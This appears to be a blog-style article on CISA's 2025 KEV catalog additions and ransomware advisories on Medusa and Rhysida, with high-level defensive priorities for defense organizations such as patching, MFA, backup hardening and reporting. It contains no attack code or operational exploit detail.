The Cybersecurity and Infrastructure Security Agency (CISA) continues to publish targeted advisories that defense organizations must treat as operational guidance, not optional reading. Recent activity through early May 2025 reinforces two enduring lessons. First, adversaries exploit known, unpatched vulnerabilities at scale. Second, ransomware and targeted intrusion campaigns keep evolving their initial access and living-off-the-land techniques. Below I outline what defense-aligned teams should prioritize immediately and how to fold CISA guidance into durable cyber-physical risk management.
What CISA is signaling right now
On May 2, 2025 CISA added two vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, a curated list that federal civilian agencies are required to remediate under BOD 22-01. The additions underscore that both enterprise backup and web frameworks remain attractive targets: a Commvault Command Center path traversal issue and a Yii framework alternate-path protection problem were added to the catalog. Inclusion in the KEV means these are actively exploited vulnerabilities and should be prioritized in vulnerability management workflows.
CISA and co-authors also continue to publish and update #StopRansomware advisories focused on variants that have hit critical sectors. In March 2025 the agency, the FBI, and MS-ISAC released a joint advisory on Medusa ransomware that describes the principal TTPs, detection methods, and initial-access patterns seen in recent campaigns. A separate advisory for the Rhysida group was updated at the end of April 2025 to refresh IOCs and observed tooling. These advisories are practical intelligence: they list observed behaviors, common exploitation vectors, and concrete mitigations meant for rapid operational use.
Why this matters to defense organizations
Defense networks and systems are high value for both espionage and disruption. The KEV process and ransomware advisories together show a predictable lifecycle. Adversaries find or reuse public exploits, weaponize them into commodity tooling or targeted campaigns, and conduct follow-on intrusion activities that can pivot to operational technology or mission systems. The cost of ignoring a KEV-remediated vulnerability is not theoretical: it translates into footholds that can be used to exfiltrate sensitive data or degrade availability at scale. BOD 22-01 bridges policy and practice by mandating remediation timelines for the federal enterprise, and its logic applies equally to defense contractors and supporting commercial infrastructure.
Practical priorities for defense teams
1) Treat the KEV Catalog as a daily operational input. Integrate CISA KEV notifications into your ticketing and orchestration pipelines. Map each new KEV against your asset inventory and enforce patch or mitigation within the organization-defined SLA. If a vendor patch is not available, implement compensating controls such as network segmentation, access filtering, or temporary disablement of the affected service.
2) Harden remote access and reduce credential-based entry points. CISA and the joint ransomware advisories repeatedly call out compromised credentials, VPN and RMM abuse, and missing multifactor authentication as leading initial access vectors. Enforce MFA, restrict administrative access to explicit allow-lists, and implement just-in-time privileged access for elevated sessions.
3) Assume living-off-the-land activity. Recent advisories describe attackers using legitimate utilities and cloud-native CLI tools for data staging and exfiltration. Monitor for anomalous use of PowerShell, AZCopy, Storage Explorer, and other administrative binaries. Baseline normal tool usage and deploy detections that flag unusual command parameters or connections to unfamiliar cloud endpoints.
4) Ensure backups are immutable and offline tested. Ransomware trends remain focused on double extortion. Isolated, air-gapped, or immutable backups plus tested recovery playbooks materially reduce both business impact and negotiating leverage. Tabletop and live recovery tests should include scenarios where cryptographic keys, backup credentials, or orchestration platforms are targeted.
5) Protect cyber-physical control points and C2 channels for unmanned systems. For defense organizations that integrate aerial platforms or other cyber-physical systems, apply the KEV and adversary TTP remit to both IT and OT. Harden command and control links, limit remote update capabilities, and maintain strict separation of test and production control planes. Where possible, adopt FIDO or certificate-based device authentication for critical C2 channels and verify firmware provenance before updates are accepted.
6) Use CISA playbooks and coordinate reporting. CISA provides Shields Up guidance for heightened posture and step-by-step actions for organizations of all sizes. When incidents occur, report them to CISA and law enforcement as advised in the joint advisories so that IOCs and campaign attributes feed back into broader defenses. Reporting enables faster KEV identification and more precise advisories.
Operationalizing advisories into procurement and sustainment
Adversaries exploit not only software flaws but also procurement gaps and lifecycle practices. Contract language for suppliers that support defense systems should mandate timely disclosure of vulnerabilities, patch timelines, and a defined incident notification process that aligns with federal guidance. Require vendors to demonstrate secure-by-design measures for firmware updates, supply chain attestations, and minimal default services on appliances. Incorporate KEV awareness into vendor risk assessments so that third-party components are not the silent enablers of mission risk.
Closing recommendations
CISA advisories are no longer background reading. They are operational inputs designed to reduce adversary options quickly. For defense organizations the immediate task is to move from awareness to automation: connect KEV feeds to asset inventories, prioritize remediation based on exposure and mission impact, harden remote access, and run recovery exercises that include cyber-physical contingencies. Finally, maintain a continuous feedback loop with trusted government and industry partners so that advisories become a shared defense mechanism rather than a series of checkboxes. Doing so will shrink the attack surface and make it materially harder for adversaries to turn a single exploited vulnerability into a strategic loss.